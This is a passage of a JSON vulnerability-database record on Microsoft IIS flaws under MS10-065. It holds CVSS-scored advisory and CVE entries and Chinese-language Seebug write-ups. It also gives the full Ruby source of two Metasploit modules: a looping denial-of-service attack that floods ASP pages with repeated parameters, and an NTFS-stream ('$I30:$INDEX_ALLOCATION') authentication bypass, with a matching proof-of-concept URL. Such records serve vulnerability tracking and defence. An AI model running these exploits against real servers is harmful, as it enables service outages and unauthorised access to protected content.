A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server.", "cvss3": {}, "published": "2013-12-02T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Request Header Buffer Overflow (MS10-065; CVE-2010-2730)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730"], "modified": "2013-12-18T00:00:00", "id": "CPAI-2013-3631", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-26T09:26:33", "description": "A code execution vulnerability exists in Microsoft Internet Information Services (IIS).", "cvss3": {}, "published": "2013-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Request Header Buffer Overflow (MS10-065; CVE-2010-2730) - ver 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2022-05-26T00:00:00", "id": "CPAI-2013-3648", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:02:35", "description": "Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka \"IIS Repeated Parameter Request Denial of Service Vulnerability.\"", "cvss3": {}, "published": "2010-09-15T19:00:00", "type": "cve", "title": "CVE-2010-1899", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/a:microsoft:internet_information_server:6.0", "cpe:/a:microsoft:internet_information_services:7.5"], "id": "CVE-2010-1899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1899", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_services:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:18:01", "description": "Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka \"Directory Authentication Bypass Vulnerability.\"", "cvss3": {}, "published": "2010-09-15T19:00:00", "type": "cve", "title": "CVE-2010-2731", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2731"], "modified": 
"2020-11-23T19:49:00", "cpe": [], "id": "CVE-2010-2731", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2731", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:17:59", "description": "Buffer overflow in Microsoft Internet Information Services (IIS) 7.5, when FastCGI is enabled, allows remote attackers to execute arbitrary code via crafted headers in a request, aka \"Request Header Buffer Overflow Vulnerability.\"", "cvss3": {}, "published": "2010-09-15T19:00:00", "type": "cve", "title": "CVE-2010-2730", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/a:microsoft:internet_information_services:7.5"], "id": "CVE-2010-2730", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_services:7.5:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:08:15", "description": "BUGTRAQ ID: 43140\r\nCVE ID: CVE-2010-1899\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft 
Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u4e2d\u7684\u811a\u672c\u5904\u7406\u4ee3\u7801\u5728\u5904\u7406\u91cd\u590d\u7684\u53c2\u6570\u8bf7\u6c42\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5bf9IIS\u6240\u627f\u8f7d\u7f51\u7ad9\u7684ASP\u9875\u9762\u53d1\u9001\u7279\u5236URI\u8bf7\u6c42\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u670d\u52a1\u5d29\u6e83\u3002\n\nMicrosoft IIS 7.5\r\nMicrosoft IIS 7.0\r\nMicrosoft IIS 6.0\r\nMicrosoft IIS 5.1\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728IIS\u670d\u52a1\u5668\u4e0a\u4e34\u65f6\u7981\u7528ASP\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-065\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-065\uff1aVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-065.mspx?pf=true", "cvss3": {}, "published": "2010-09-17T00:00:00", "type": "seebug", "title": "Microsoft IIS\u91cd\u590d\u53c2\u6570\u8bf7\u6c42\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff08MS10-065\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1899"], "modified": "2010-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20121", "id": "SSV:20121", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:08:20", "description": "BUGTRAQ ID: 41314\r\nCVE ID: CVE-2010-2731\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft 
Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406\u76ee\u5f55\u7684\u57fa\u7840\u8ba4\u8bc1\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u8bf7\u6c42\u7684\u76ee\u5f55\u540d\u540e\u9644\u52a0NTFS\u6d41\u540d\u79f0\u548c\u6d41\u7c7b\u578b\uff08:$i30:$INDEX_ALLOCATION\uff09\u7ed5\u8fc7\u8ba4\u8bc1\u8bbf\u95ee\u53d7\u4fdd\u62a4\u7684\u76ee\u5f55\u3002\r\n\n\nMicrosoft IIS 5.1\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-065\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-065\uff1aVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-065.mspx?pf=true", "cvss3": {}, "published": "2010-09-17T00:00:00", "type": "seebug", "title": "Microsoft IIS\u4ea4\u6362\u6570\u636e\u6d41\u7ed5\u8fc7\u8ba4\u8bc1\u6f0f\u6d1e(MS10-065)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-2731"], "modified": "2010-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20120", "id": "SSV:20120", "sourceData": "\n http://victim.com/SecretFolder:$I30:$Index_Allocation/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20120", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:08:17", "description": "BUGTRAQ ID: 43138\r\nCVE ID: CVE-2010-2730\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft 
Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\n\u5bf9\u4e8e\u542f\u7528\u4e86FastCGI\u529f\u80fd\u7684IIS\u670d\u52a1\u5668\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u7279\u5236\u7684HTTP\u8bf7\u6c42\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nMicrosoft IIS 7.5\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528FastCGI\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-065\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-065\uff1aVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-065.mspx?pf=true", "cvss3": {}, "published": "2010-09-17T00:00:00", "type": "seebug", "title": "Microsoft IIS FastCGI\u8bf7\u6c42\u5934\u8fdc\u7a0b\u6ea2\u51fa\u6f0f\u6d1e\uff08MS10-065\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2010-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20122", "id": "SSV:20122", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-08-22T00:07:29", "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. 
This requires that the IIS server hosts Active Server Pages and that an ASP script reads a POST form value.\n", "edition": 2, "cvss3": {}, "published": "2010-11-24T20:10:01", "type": "metasploit", "title": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',\n 'Description' => %q{\n The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.\n },\n 'Author' =>\n [\n 'Heyder Andrade <heyder[at]alligatorteam.org>',\n 'Leandro Oliveira <leadro[at]alligatorteam.org>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1899' ],\n [ 'OSVDB', '67978'],\n [ 'MSB', 'MS10-065'],\n [ 'EDB', '15167' ]\n ],\n 'DisclosureDate' => 'Sep 14 2010'))\n\n register_options(\n [\n Opt::RPORT(80),\n 
OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),\n OptString.new('URI', [ true, 'URI to request', '/page.asp' ])\n ])\n end\n\n\n def run\n uri = datastore['URI']\n print_status(\"Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}\")\n\n begin\n while(1)\n begin\n connect\n payload = \"C=A&\" * 40000\n length = payload.size\n sploit = \"HEAD #{uri} HTTP/1.1\\r\\n\"\n sploit << \"Host: #{datastore['VHOST'] || rhost}\\r\\n\"\n sploit << \"Connection:Close\\r\\n\"\n sploit << \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n sploit << \"Content-Length:#{length} \\r\\n\\r\\n\"\n sploit << payload\n sock.put(sploit)\n #print_status(\"DoS packet sent.\")\n disconnect\n rescue Errno::ECONNRESET\n next\n end\n end\n rescue Errno::EPIPE\n print_good(\"IIS should now be unavailable\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-12T22:04:44", "description": "This module bypasses basic authentication for Internet Information Services (IIS). 
By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.\n", "edition": 2, "cvss3": {}, "published": "2012-06-25T20:48:36", "type": "metasploit", "title": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2731"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',\n 'Description' => %q{\n This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.\n },\n 'References' =>\n [\n [ 'CVE', '2010-2731' ],\n [ 'OSVDB', '66160' ],\n [ 'MSB', 'MS10-065' ],\n [ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]\n ],\n 'Author' =>\n [\n 'Soroush Dalili',\n 'sinn3r'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Jul 02 2010\"\n ))\n\n register_options(\n [\n OptString.new(\"TARGETURI\", [true, 'The URI directory where basic auth is enabled', '/'])\n ])\n end\n\n\n 
def has_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n vprint_status(res.body) if res\n\n return (res and res.code == 401)\n end\n\n def try_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n uri << Rex::Text.rand_text_alpha(rand(10)+5) + \".#{Rex::Text.rand_text_alpha(3)}\"\n\n dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'\n\n user = Rex::Text.rand_text_alpha(rand(10) + 5)\n pass = Rex::Text.rand_text_alpha(rand(10) + 5)\n\n\n vprint_status(\"Requesting: #{dir}\")\n res = send_request_cgi({\n 'uri' => dir,\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n vprint_status(res.body) if res\n\n return (res and res.code != 401 and res.code != 404) ? dir : ''\n end\n\n def run\n if not has_auth\n print_error(\"No basic authentication enabled\")\n return\n end\n\n bypass_string = try_auth\n\n if bypass_string.empty?\n print_error(\"The bypass attempt did not work\")\n else\n print_good(\"You can bypass auth by doing: #{bypass_string}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/iis_auth_bypass.rb", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}